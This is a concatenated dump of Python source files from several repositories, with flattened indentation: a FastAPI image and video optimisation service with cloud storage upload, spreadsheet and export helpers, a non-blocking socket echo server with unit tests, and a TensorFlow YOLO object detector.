if Path(os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH') + pathsToClean['original']).is_file():
Path(os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH') + pathsToClean['original']).unlink()
if pathsToClean.get('optimized'):
if Path(os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + pathsToClean['optimized']).is_file():
Path(os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + pathsToClean['optimized']).unlink()
def local_savings(images = False, videos = False, qrCodes = False):
if images:
Path(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
elif videos:
Path(os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
Path(os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
elif qrCodes:
Path(os.environ.get('QR_IMAGE_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
```
#### File: services/images/resize.py
```python
import os
import ffmpeg
from PIL import Image
from uuid import uuid4
from pathlib import Path
from fastapi import HTTPException, status
from ..helpers.alena import local_savings
from ..helpers.uniqueFileName import generate_unique_name
def resize_image(temp_stored_file: Path, extension: str, thumbnail: bool, desiredExtension: str):
if not thumbnail and not os.environ.get('SAVE_ORIGINAL') == 'True':
raise HTTPException(status_code=status.HTTP_503_SERVICE_UNAVAILABLE, detail='Save original is dissabled, contact admin')
local_savings(images=True)
if os.environ.get('IMAGE_OPTIMIZATION_USING') == 'ffmpeg':
return resize_image_pillow_FFMPEG(temp_stored_file, extension, thumbnail, desiredExtension)
return resize_image_pillow_SIMD(temp_stored_file, extension, thumbnail, desiredExtension)
def resize_image_pillow_SIMD(temp_stored_file: Path, extension: str, thumbnail: bool, desiredExtension: str):
try:
origin, thumb = generate_unique_name(extension, desiredExtension)
img = Image.open(temp_stored_file)
if os.environ.get('SAVE_ORIGINAL') == 'True':
img.save(Path(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + origin).absolute())
else:
origin = None
if thumbnail:
resize_width = int(os.environ.get('THUMBNAIL_MAX_WIDHT'))
wpercent = (resize_width/float(img.size[0]))
hsize = int((float(img.size[1])*float(wpercent)))
img.thumbnail((resize_width,hsize), Image.BICUBIC)
img.save(Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + thumb).absolute())
else:
thumb = None
return {
'original': origin,
'thumbnail': thumb
}
except:
raise HTTPException(status_code=503, detail="Image manipulation failed using pillow-SIMD")
def resize_image_pillow_FFMPEG(temp_stored_file: Path, extension: str, thumbnail: bool, desiredExtension: str):
try:
origin, thumb = generate_unique_name(extension, desiredExtension)
# Save original (reduces size magically)
if os.environ.get('SAVE_ORIGINAL') == 'True':
(
ffmpeg
.input(temp_stored_file)
.output(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + origin)
.run(quiet=True)
)
else:
origin = None
if thumbnail:
# Resizes and Save
(
ffmpeg
.input(temp_stored_file)
.filter("scale", os.environ.get('THUMBNAIL_MAX_WIDHT'), "-1")
.output(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + thumb)
.run(quiet=True)
)
else:
thumb = None
return {
'original': origin,
'thumbnail': thumb
}
except:
raise HTTPException(status_code=503, detail="Image manipulation failed using FFMPEG")
```
#### File: services/storage/googleCloud.py
```python
import os
from libcloud.storage.types import Provider
from libcloud.storage.providers import get_driver
from ..helpers.alena import cleaning_service
def authorize_google():
cls = get_driver(Provider.GOOGLE_STORAGE)
googleStorageDriver = cls(os.environ.get('GOOGLE_CLIENT_EMAIL'), os.environ.get('GOOGLE_STORAGE_KEY_FILE'))
googleContainer = googleStorageDriver.get_container(os.environ.get('DEFAULT_BUCKET_NAME'))
return googleStorageDriver, googleContainer
def upload_video_file_to_google_storage(videoPaths: dict):
googleCloudStorageDriver, container = authorize_google()
if videoPaths.get('original'):
with open('./' + os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH') + videoPaths['original'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('VIDEO_ORIGINAL_GOOGLE_CLOUD_PATH') + videoPaths['original'])
if videoPaths.get('optimized'):
with open('./' + os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + videoPaths['optimized'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('VIDEO_OPTIMIZED_GOOGLE_CLOUD_PATH') + videoPaths['optimized'])
return cleaning_service(videoPaths, videos=True)
def upload_image_file_to_google_storage(imagePaths: dict):
googleCloudStorageDriver, container = authorize_google()
if imagePaths.get('original'):
with open('./' + os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + imagePaths['original'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('IMAGE_ORIGINAL_GOOGLE_CLOUD_PATH') + imagePaths['original'])
if imagePaths.get('thumbnail'):
with open('./' + os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + imagePaths['thumbnail'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('IMAGE_THUMBNAIL_GOOGLE_CLOUD_PATH') + imagePaths['thumbnail'])
if imagePaths.get('qrImage'):
with open('./' + os.environ.get('QR_IMAGE_LOCAL_PATH') + imagePaths['qrImage'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('QR_IMAGE_GOOGLE_CLOUD_PATH') + imagePaths['qrImage'])
return cleaning_service(imagePaths, images=True)
```
#### File: services/storage/local.py
```python
import os
from pathlib import Path
from fastapi.responses import FileResponse
from fastapi import HTTPException,status
def response_image_file(filename:str, image_type:str):
validPath = {
'original': os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH'),
'thumbnail': os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH'),
'qrImage': os.environ.get('QR_IMAGE_LOCAL_PATH'),
}
if not Path(validPath[image_type] + filename).is_file():
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail='File not found please recheck name')
return FileResponse(validPath[image_type] + filename)
```
#### File: services/videos/optimize.py
```python
import os
import ffmpeg
from PIL import Image
from pathlib import Path
from ..helpers.uniqueFileName import generate_unique_name
from ..helpers.alena import local_savings
from fastapi import HTTPException, status
def video_file_FFMPEG(temp_stored_file: Path, optimize: bool):
try:
if not optimize and not os.environ.get('SAVE_ORIGINAL') == 'True':
raise HTTPException(status_code=status.HTTP_503_SERVICE_UNAVAILABLE, detail='Save original is dissabled, contact admin')
local_savings(videos=True)
origin, optimized = generate_unique_name(os.environ.get('VIDEO_AllOWED_FILE_FORMAT'), os.environ.get('VIDEO_DESIRED_FILE_FORMAT'))
# Save original with config is ready for original file of mp4 or mov also decreases size by default
if os.environ.get('SAVE_ORIGINAL') == 'True':
(
ffmpeg
.input(temp_stored_file)
.output(os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH') + origin, vcodec='h264', acodec='aac')
.run(quiet=True)
)
else:
origin = None
if optimize:
audio = ffmpeg.input(temp_stored_file).audio
video = ffmpeg.input(temp_stored_file).video.filter('scale', size='640x1136', force_original_aspect_ratio='decrease').filter('pad', '640', '1136', '(ow-iw)/2', '(oh-ih)/2')
ffmpeg.concat(video, audio, v=1, a=1)
# ffmpeg config for webm
# Also is possible to use vcodec libvpx-vp9 but sometimes it increzes size needs testing may it suits you more
# Check docs https://trac.ffmpeg.org/wiki/Encode/VP9
if os.environ.get('VIDEO_DESIRED_FILE_FORMAT') == 'webm':
out = ffmpeg.output(video, audio, os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + optimized, crf='10', qmin='0', qmax='50', video_bitrate='1M', vcodec='libvpx', acodec='libvorbis')
# ffmpeg config for mp4
elif os.environ.get('VIDEO_DESIRED_FILE_FORMAT') == 'mp4':
out = ffmpeg.output(video, audio, os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + optimized, vcodec='h264', acodec='aac')
out.run(quiet=True)
else:
optimized = None
return {
'original': origin,
'optimized': optimized
}
except:
raise HTTPException(status_code=503, detail="Video manipulation failed using FFMPEG")
```
|
{
"source": "Jexulie/tsoft-lib",
"score": 3
}
|
#### File: tsoftlib/helpers/excelReader.py
```python
from xlrd import open_workbook
import os
import re
DEFAULTEXCELPATH = './excel'
def readDir():
l = []
(_, _, fileList) = next(os.walk(DEFAULTEXCELPATH))
for f in fileList:
if re.match(r'^.*\.xlsx$', f):
l.append(f)
return l
def readExcel():
excelData = {}
for file in readDir():
book = open_workbook(DEFAULTEXCELPATH + '/' + file)
bookData = []
for sheet in book.sheets():
sheetData = []
for row in range(1, sheet.nrows):
col_names = sheet.row(0)
rowData = []
for name, col in zip(col_names, range(sheet.ncols)):
value = str(sheet.cell(row, col).value)
rowValues = {
"colName": name.value,
"rowValue": value
}
rowData.append(rowValues)
sheetData.append(rowData)
bookData.append(sheetData)
excelData[file] = bookData
return excelData
```
#### File: tsoftlib/helpers/fileMaker.py
```python
import os
def makeFolderIfNotExists(path):
os.makedirs(path, exist_ok=True)
```
#### File: tsoftlib/helpers/printer.py
```python
import xlsxwriter
import json
from dicttoxml import dicttoxml
from .fileMaker import makeFolderIfNotExists
DEFAULTOUTPUTPATH = './output'
# filename[str] | data[list of dict] -> colsname / values
def PrintToExcel(fileName, data):
makeFolderIfNotExists(DEFAULTOUTPUTPATH)
workbook = xlsxwriter.Workbook(f'{DEFAULTOUTPUTPATH}/{fileName}.xlsx')
worksheet = workbook.add_worksheet('1')
row = 0
col = 0
colNames = data[0].keys()
# Write ColumnNames to First Row of sheet
for names in colNames:
worksheet.write(row, col, names)
col += 1
col = 0
row += 1
for item in data:
for index, name in enumerate(colNames):
try:
worksheet.write(row, index, item[name])
except:
worksheet.write(row, index, '')
row += 1
workbook.close()
def PrintToJson(fileName, data):
makeFolderIfNotExists(DEFAULTOUTPUTPATH)
with open(f'{DEFAULTOUTPUTPATH}/{fileName}.json', 'w+') as file:
file.write(json.dumps(data))
file.close()
def PrintToXML(fileName, data):
makeFolderIfNotExists(DEFAULTOUTPUTPATH)
with open(f'{DEFAULTOUTPUTPATH}/{fileName}.xml', 'w+') as file:
file.write(dicttoxml(data).decode('UTF-8'))
file.close()
```
|
{
"source": "JexusLeon/python_socket_test",
"score": 3
}
|
#### File: py_socket_test/core/server.py
```python
import sys
import types
import socket
import selectors
import logging
logging.basicConfig(
level=logging.DEBUG,
handlers=[logging.FileHandler('server.log', encoding='utf-8')],
datefmt='%d-%m-%Y %H:%M:%S',
format='[%(asctime)s] [%(levelname)s]: %(message)s',
)
class ServerSocket(object):
"""A server that Handling Multiple Connections."""
def __init__(self, host='', port=65400):
self.HOST = host # Symbolic name meaning all available interfaces
self.PORT = port # Arbitrary non-privileged port
self.is_listening = False
self._socket = None
self._logger = logging.getLogger()
self._slt = selectors.DefaultSelector()
def listen(self):
"""Create a new socket using the given address family,
socket type. And registers the socket to be monitored."""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.bind((self.HOST, self.PORT)) # Bind the socket to address
self._socket.listen(1)
self._socket.setblocking(False) # Configure the socket in non-blocking mode.
self._slt.register(self._socket, selectors.EVENT_READ, data=None)
self.is_listening = True
msg = 'Server Listening on %s:%s' % (self.HOST, self.PORT)
print(msg)
logging.debug(msg)
self._run_daemon()
def close(self):
"""Close connection"""
self._slt.close()
self._socket.close()
self._socket = None
self.is_listening = False
def set_debug(self, debug):
"""Set Debug"""
self._logger.disabled = not debug
def _accept_wrapper(self, sock):
"""Accept Wrapper"""
conn, addr = sock.accept() # Should be ready to read
logging.debug("Accepted Connection From %s:%s" % addr)
conn.setblocking(False)
# We’ll use data to keep track of what’s been sent and received on the socket.
data = types.SimpleNamespace(addr=addr, inb=b"", outb=b"")
events = selectors.EVENT_READ | selectors.EVENT_WRITE
self._slt.register(conn, events, data=data)
def _service_connection(self, key, mask):
"""Read the data sent by the client process it and return it."""
sock = key.fileobj # The socket object
data = key.data
recv_data = None
if mask & selectors.EVENT_READ:
try:
recv_data = sock.recv(1024) # Should be ready to read
except ConnectionResetError:
pass
finally:
if recv_data:
data.outb = recv_data
else:
# This means that the client has closed their socket, so the server should too.
logging.debug("Closing Connection To %s:%s" % data.addr)
self._slt.unregister(sock)
sock.close()
if mask & selectors.EVENT_WRITE:
if data.outb:
response = self.echo(data.outb)
sock.send(response) # Should be ready to write
data.outb = b'' # The bytes sent are then removed from the send buffer:
@staticmethod
def echo(data):
"""Overwrite this method to modify the data."""
return data
def _run_daemon(self):
"""Run Daemon"""
try:
while True:
events = self._slt.select(timeout=None) # Blocks until there are sockets ready for I/O.
for key, mask in events:
if key.data is None:
self._accept_wrapper(key.fileobj)
else:
self._service_connection(key, mask)
except KeyboardInterrupt:
logging.debug("Caught keyboard interrupt, exiting")
finally:
self.close()
if __name__ == '__main__':
if len(sys.argv) != 3:
print("usage:", sys.argv[0], "<host> <port>")
sys.exit(1)
server = ServerSocket(sys.argv[1], int(sys.argv[2]))
server.listen()
```
#### File: py_socket_test/test/test_app.py
```python
import os
import unittest
import threading
from py_socket_test.utils.evaluate import evaluate
from py_socket_test.core.server import ServerSocket
from py_socket_test.core.client import ClientSocket
class SocketConnectionTestCase(unittest.TestCase):
"""Socket Connection TestCase"""
host = '127.0.0.1'
port = 55430
server = ServerSocket(host, port)
client = ClientSocket(host, port)
@classmethod
def setUpClass(cls):
cls.create_server()
@classmethod
def create_server(cls):
"""Create Server"""
def echo(data):
response = str(evaluate(data.decode())).encode()
return response
cls.server.echo = echo
cls.server.set_debug(True)
t = threading.Thread(target=cls.server.listen)
t.daemon = True
t.start()
def test_server(self):
"""Test Server"""
self.assertEqual(self.server.is_listening, True)
def test_client(self):
"""Test Client"""
app_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
file_name = os.path.join(app_path, 'utils', 'operations.txt')
self.client.set_debug(True)
self.client.connect()
self.assertEqual(self.client.is_connected, True)
self.client.send_file(file_name)
self.client.close()
self.assertEqual(self.client.is_connected, False)
def test_evaluate(self):
"""Test Evaluate"""
self.assertEqual(evaluate('74 - 36 - 96 + 32 + 2 + 26'), 2, 'Wrong Evaluation')
self.assertEqual(evaluate('47 - 88 + 32 - 71 * 39 * 68'), -188301, 'Wrong Evaluation')
self.assertEqual(evaluate('49 - 97 + 17 + 31 / 37 + 82'), 51.83783783783784, 'Wrong Evaluation')
self.assertEqual(evaluate('59 + 59 + 3 - 28 / 41 + 84'), 204.3170731707317, 'Wrong Evaluation')
self.assertEqual(evaluate('42 + 23 + 75 - 90'), 50, 'Wrong Evaluation')
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "Jex-y/yolo",
"score": 3
}
|
#### File: Jex-y/yolo/backbones.py
```python
import tensorflow as tf
from .layers import *
# Backbones are the first stage in the YOLO model. They are used to extract features at multiple scales.
class Darknet53(tf.keras.layers.Layer):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.layer_stack_1 = [
YOLOConv( (3, 3, 32) ),
YOLOConv( (3, 3, 64), downsample=True ),
]
for i in range(1):
self.layer_stack_1.append( ResidialBlock( 32, 64 ) )
self.layer_stack_1.append(YOLOConv( (3, 3, 128), downsample=True ) )
for i in range(2):
self.layer_stack_1.append( ResidialBlock( 64, 128 ) )
self.layer_stack_1.append(YOLOConv( (3, 3, 256), downsample=True ) )
for i in range(8):
self.layer_stack_1.append( ResidialBlock( 128, 256 ) )
self.layer_stack_2 = [
YOLOConv( (3, 3, 512), downsample=True),
]
for i in range(8):
self.layer_stack_2.append( ResidialBlock( 256, 512 ) )
self.layer_stack_3 = [
YOLOConv((3, 3, 1024), downsample=True),
]
for i in range(4):
self.layer_stack_3.append( ResidialBlock( 512, 1024 ) )
def call(self, x):
for layer in self.layer_stack_1:
x = layer(x)
scale_1 = x
for layer in self.layer_stack_2:
x = layer(x)
scale_2 = x
for layer in self.layer_stack_3:
x = layer(x)
scale_3 = x
return scale_1, scale_2, scale_3
class CSPDarknet53(tf.keras.layers.Layer):
def __init__(self):
super().__init__()
self.layer_stack_1 = [
YOLOConv( (3, 3, 32), activation="mish" ),
YOLOConv( (3, 3, 54), downsample=True, activation="mish" ),
]
self.layer_stack_2 = [
YOLOConv( (1, 1, 64), activation="mish" ),
]
self.layer_stack_2_skip = [
YOLOConv( (1, 1, 64), activation="mish" ),
]
for i in range(1):
self.layer_stack_2_skip.append( ResidialBlock( 64, 32, 64, activation="mish" ) )
self.layer_stack_2_skip.append( YOLOConv( (1, 1, 64), activation="mish" ) )
self.layer_stack_3 = [
YOLOConv( (1, 1, 64), activation="mish" ),
YOLOConv( (3, 3, 128), downsample=True, activation="mish" ),
]
self.layer_stack_4 = [
YOLOConv( (1, 1, 64), activation="mish" ),
]
for i in range(2):
self.layer_stack_4.append( ResidialBlock( 64, 64, 64, activation="mish") )
self.layer_stack_4.append( YOLOConv( (1, 1, 64), activation="mish" ) )
self.layer_stack_4_skip = [
YOLOConv( (1, 1, 64), activation="mish" ),
]
self.layer_stack_5 = [
YOLOConv( (1, 1, 128), activation="mish" ),
YOLOConv( (3, 3, 256), downsample=True, activation="mish" ),
]
self.layer_stack_6 = [
YOLOConv( (1, 1, 128), activation="mish" ),
]
for i in range(8):
self.layer_stack_6.append( ResidialBlock( 128, 128, 128, activation="mish") )
self.layer_stack_6.append( YOLOConv( (1, 1, 128), activation="mish" ) )
self.layer_stack_6_skip = [
YOLOConv( (1, 1, 128), activation="mish" ),
]
self.layer_stack_7 = [
YOLOConv( (1, 1, 256), activation="mish" ),
]
self.layer_stack_8 = [
YOLOConv( (3, 3, 512), downsample=True, activation="mish" ),
]
self.layer_stack_9 = [
YOLOConv( (1, 1, 256), activation="mish" ),
]
for i in range(8):
self.layer_stack_9.append( ResidialBlock( 256, 256, 256, activation="mish" ) )
self.layer_stack_9.append( YOLOConv( (1, 1, 256), activation="mish" ) )
self.layer_stack_9_skip = [
YOLOConv( (1, 1, 256), activation="mish" ),
]
self.layer_stack_10 = [
YOLOConv( (1, 1, 512), activation = "mish" ),
]
self.layer_stack_11 = [
YOLOConv( (3, 3, 1024), downsample=True, activation="mish" ),
]
self.layer_stack_12 = [
YOLOConv( (1, 1, 512), activation="mish" ),
]
for i in range(4):
self.layer_stack_12.append( ResidialBlock( 512, 512, 512, activation="mish") )
self.layer_stack_12.append( YOLOConv( (1, 1, 512), activation="mish" ) )
self.layer_stack_12_skip = [
YOLOConv( (1, 1, 512), activation="mish" ),
]
self.layer_stack_13 = [
YOLOConv( (1, 1, 1024), activation="mish" ),
YOLOConv( (1, 1, 512) ),
YOLOConv( (3, 3, 1024) ),
YOLOConv( (1, 1, 512) ),
]
self.layer_stack_14 = [
YOLOConv( (1, 1, 512) ),
YOLOConv( (3, 3, 1024) ),
YOLOConv( (1, 1, 512) ),
]
def call(self, x):
for layer in self.layer_stack_1:
x = layer(x)
route = x
for layer in self.layer_stack_2:
route = layer(route)
for layer in self.layer_stack_2_skip:
x = layer(x)
x = tf.concat( [x, route], axis=-1 )
for layer in self.layer_stack_3:
x = layer(x)
route = x
for layer in self.layer_stack_4:
x = layer(x)
for layer in self.layer_stack_4_skip:
route = layer(route)
x = tf.concat( [x, route], axis=-1 )
for layer in self.layer_stack_5:
x = layer(x)
route = x
for layer in self.layer_stack_6:
x = layer(x)
for layer in self.layer_stack_6_skip:
route = layer(route)
x = tf.concat([x, route], axis=-1)
for layer in self.layer_stack_7:
x = layer(x)
route_1 = x
for layer in self.layer_stack_8:
x = layer(x)
route = x
for layer in self.layer_stack_9:
x = layer(x)
for layer in self.layer_stack_9_skip:
route = layer(route)
x = tf.concat( [x, route], axis=-1 )
for layer in self.layer_stack_10:
x = layer(x)
route_2 = x
for layer in self.layer_stack_11:
x = layer(x)
route = x
for layer in self.layer_stack_12:
x = layer(x)
for layer in self.layer_stack_12_skip:
route = layer(route)
x = tf.concat( [x, route], axis=-1 )
for layer in self.layer_stack_13:
x = layer(x)
x = tf.concat( [
tf.nn.max_pool( x, ksize=13, padding='SAME', strides=1 ),
tf.nn.max_pool(x, ksize=9, padding='SAME', strides=1),
tf.nn.max_pool(x, ksize=5, padding='SAME', strides=1),
x
], axis=-1 )
for layer in self.layer_stack_14:
x = layer(x)
return route_1, route_2, x
```
#### File: Jex-y/yolo/detectors.py
```python
import tensorflow as tf
from . import layers
class YoloV3(tf.keras.layers.Layer):
def __init__(self, num_classes, **kwargs):
super().__init__(**kwargs)
self.num_classes = num_classes
self.layer_stack_1 = [
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
]
self.lbbox_layer_stack = [
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 3*(self.num_classes + 5)), activation=None, batchNormalization=False, name="lbbox" ),
]
self.layer_stack_2 = [
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
]
self.mbbox_layer_stack = [
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 3*(self.num_classes + 5)), activation=None, batchNormalization=False, name="mbbox" ),
]
self.sbbox_layer_stack = [
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 3*(self.num_classes + 5)), activation=None, batchNormalization=False, name="sbbox"),
]
def call(self, scale_1, scale_2, scale_3, training=False) :
x = scale_3
for layer in self.layer_stack_1:
x = layer(x)
lbbox_output = x
for layer in self.lbbox_layer_stack:
lbbox_output = layer(lbbox_output)
x = layers.Upsample()(x)
x = tf.concat( [scale_2, x], axis=-1 )
for layer in self.layer_stack_2:
x = layer(x)
mbbox_output = x
for layer in self.mbbox_layer_stack:
mbbox_output = layer(mbbox_output)
x = layers.Upsample()(x)
sbbox_output = tf.concat( [scale_1, x], axis=-1 )
for layer in self.sbbox_layer_stack:
sbbox_output = layer(sbbox_output)
return sbbox_output, mbbox_output, lbbox_output
```
#### File: Jex-y/yolo/losses.py
```python
import tensorflow as tf
from . import utils
import numpy as np
# strides = self.strides[scale]
# num_classes = self.num_classes
# iou_loss_threshold = self.iou_loss_threshold
# @tf.function
def yolo_loss(pred, conv, label, bboxes, input_size, iou_loss_threshold):
conv_raw_conf = conv[:, :, :, :, 4:5]
conv_raw_prob = conv[:, :, :, :, 5:]
pred_xywh = pred[:, :, :, :, 0:4]
pred_conf = pred[:, :, :, :, 4:5]
label_xywh = label[:, :, :, :, 0:4]
respond_bbox = label[:, :, :, :, 4:5]
label_prob = label[:, :, :, :, 5:]
giou = tf.expand_dims(utils.bbox_giou(pred_xywh, label_xywh), axis=-1)
input_size = tf.cast(input_size, tf.float32)
bbox_loss_scale = 2.0 - 1.0 * label_xywh[:, :, :, :, 2:3] * label_xywh[:, :, :, :, 3:4] / (input_size ** 2)
giou_loss = respond_bbox * bbox_loss_scale * (1- giou)
iou = utils.bbox_iou(pred_xywh[:, :, :, :, np.newaxis, :], bboxes[:, np.newaxis, np.newaxis, np.newaxis, :, :])
max_iou = tf.expand_dims(tf.reduce_max(iou, axis=-1), axis=-1)
respond_bgd = (1.0 - respond_bbox) * tf.cast( max_iou < iou_loss_threshold, tf.float32 )
conf_focal = tf.pow(respond_bbox - pred_conf, 2)
conf_loss = conf_focal * (
respond_bbox * tf.nn.sigmoid_cross_entropy_with_logits(labels=respond_bbox, logits=conv_raw_conf)
+
respond_bgd * tf.nn.sigmoid_cross_entropy_with_logits(labels=respond_bbox, logits=conv_raw_conf)
)
prob_loss = respond_bbox * tf.nn.sigmoid_cross_entropy_with_logits(labels=label_prob, logits=conv_raw_prob)
giou_loss = tf.reduce_mean(tf.reduce_sum(giou_loss, axis=[1,2,3,4]))
conf_loss = tf.reduce_mean(tf.reduce_sum(conf_loss, axis=[1,2,3,4]))
prob_loss = tf.reduce_mean(tf.reduce_sum(prob_loss, axis=[1,2,3,4]))
return giou_loss, conf_loss, prob_loss
def get_yolo_loss_at_scales(scales, num_classes, strides, iou_loss_threshold, xyscale, anchors):
losses = []
for scale in scales[::-1]:
@tf.function
def loss(target, output):
output_shape = tf.shape(output)
batch_size = output_shape[0]
output_size = output_shape[1]
input_size = output_size * strides[scale]
output_shape = (batch_size, output_size, output_size, 3, 5+num_classes)
target_split = np.prod(output_shape[1:])
output = tf.reshape(output, output_shape)
labels = tf.reshape(target[:,:target_split], output_shape)
bboxes = tf.reshape(target[:,target_split:], (batch_size, 128, 4))
decoded = utils.decode_train(output, scale, output_size, num_classes, strides, xyscale, anchors)
giou_loss, conf_loss, prob_loss = yolo_loss(decoded, output, labels, bboxes, input_size, iou_loss_threshold)
return giou_loss + conf_loss + prob_loss
losses.append(loss)
return losses
```
#### File: Jex-y/yolo/utils.py
```python
import numpy as np
import cv2
import tensorflow as tf
def image_preprocess(image, bboxes, train_input_size):
"""Rescales images to the correct size whilst also adjusting the bounding boxes accordingly.
Args:
image (np.ndarray): The image to be resized.
bboxes (np.ndarray): The bounding boxes related to the image.
Returns:
np.ndarray: The adjusted image.
np.ndarray: The adjusted bboxes.
"""
target_height = target_width = train_input_size
height, width, _ = image.shape
scale = min(target_width/width, target_height/height)
new_height, new_width = int(scale * height), int(scale * width)
image_resized = cv2.resize(image, (new_height, new_width))
image_paded = np.full(shape=[target_height, target_width, 3], fill_value=128.0)
pad_height, pad_width = (target_height-new_height) // 2, (target_width - new_width) // 2
image_paded[pad_width:new_width+pad_width, pad_height:new_height+pad_height, :] = image_resized
image_paded = image_paded / 256.
# 256 used as it is an exact power of 2 so only the exponent is changed, useful for storing in half precision
bboxes[:, [0, 2]] = bboxes[:, [0, 2]] * scale + pad_width
bboxes[:, [1, 3]] = bboxes[:, [1, 3]] * scale + pad_height
return image_paded, bboxes
@tf.function
def bbox_iou(bboxes1, bboxes2):
bboxes1_area = bboxes1[..., 2] * bboxes1[..., 3]
bboxes2_area = bboxes2[..., 2] * bboxes2[..., 3]
bboxes1_coor = tf.concat(
[
bboxes1[..., :2] - bboxes1[..., 2:] * 0.5,
bboxes1[..., :2] + bboxes1[..., 2:] * 0.5,
],
axis=-1,
)
bboxes2_coor = tf.concat(
[
bboxes2[..., :2] - bboxes2[..., 2:] * 0.5,
bboxes2[..., :2] + bboxes2[..., 2:] * 0.5,
],
axis=-1,
)
left_up = tf.maximum(bboxes1_coor[..., :2], bboxes2_coor[..., :2])
right_down = tf.minimum(bboxes1_coor[..., 2:], bboxes2_coor[..., 2:])
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = bboxes1_area + bboxes2_area - inter_area
iou = tf.math.divide_no_nan(inter_area, union_area)
return iou
@tf.function
def bbox_giou(bboxes1, bboxes2):
bboxes1_area = bboxes1[..., 2] * bboxes1[..., 3]
bboxes2_area = bboxes2[..., 2] * bboxes2[..., 3]
bboxes1_coor = tf.concat(
[
bboxes1[..., :2] - bboxes1[..., 2:] * 0.5,
bboxes1[..., :2] + bboxes1[..., 2:] * 0.5,
],
axis=-1,
)
bboxes2_coor = tf.concat(
[
bboxes2[..., :2] - bboxes2[..., 2:] * 0.5,
bboxes2[..., :2] + bboxes2[..., 2:] * 0.5,
],
axis=-1,
)
left_up = tf.maximum(bboxes1_coor[..., :2], bboxes2_coor[..., :2])
right_down = tf.minimum(bboxes1_coor[..., 2:], bboxes2_coor[..., 2:])
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = bboxes1_area + bboxes2_area - inter_area
iou = tf.math.divide_no_nan(inter_area, union_area)
enclose_left_up = tf.minimum(bboxes1_coor[..., :2], bboxes2_coor[..., :2])
enclose_right_down = tf.maximum(
bboxes1_coor[..., 2:], bboxes2_coor[..., 2:]
)
enclose_section = enclose_right_down - enclose_left_up
enclose_area = enclose_section[..., 0] * enclose_section[..., 1]
giou = iou - tf.math.divide_no_nan(enclose_area - union_area, enclose_area)
return giou
@tf.function
def decode(conv_output, scale, output_size, num_classes, strides, xyscale, anchors):
conv_raw_dxdy, conv_raw_dwdh, conv_raw_conf, conv_raw_prob = tf.split(conv_output, (2, 2, 1, num_classes),
axis=-1)
xy_grid = tf.meshgrid(tf.range(output_size), tf.range(output_size))
xy_grid = tf.expand_dims(tf.stack(xy_grid, axis=-1), axis=2) # [gx, gy, 1, 2]
xy_grid = tf.tile(tf.expand_dims(xy_grid, axis=0), [tf.shape(conv_output)[0], 1, 1, 3, 1])
xy_grid = tf.cast(xy_grid, tf.float32)
pred_xy = ((tf.sigmoid(conv_raw_dxdy) * xyscale[scale]) - 0.5 * (xyscale[scale] - 1) + xy_grid) * \
strides[scale]
pred_wh = (tf.exp(conv_raw_dwdh) * anchors[scale])
pred_xywh = tf.concat([pred_xy, pred_wh], axis=-1)
pred_conf = tf.sigmoid(conv_raw_conf)
pred_prob = tf.sigmoid(conv_raw_prob)
return pred_xywh, pred_conf, pred_prob
@tf.function
def decode_train(conv_output, scale, output_size, num_classes, strides, xyscale, anchors):
pred_xywh, pred_conf, pred_prob = decode(conv_output, scale, output_size, num_classes, strides, xyscale, anchors)
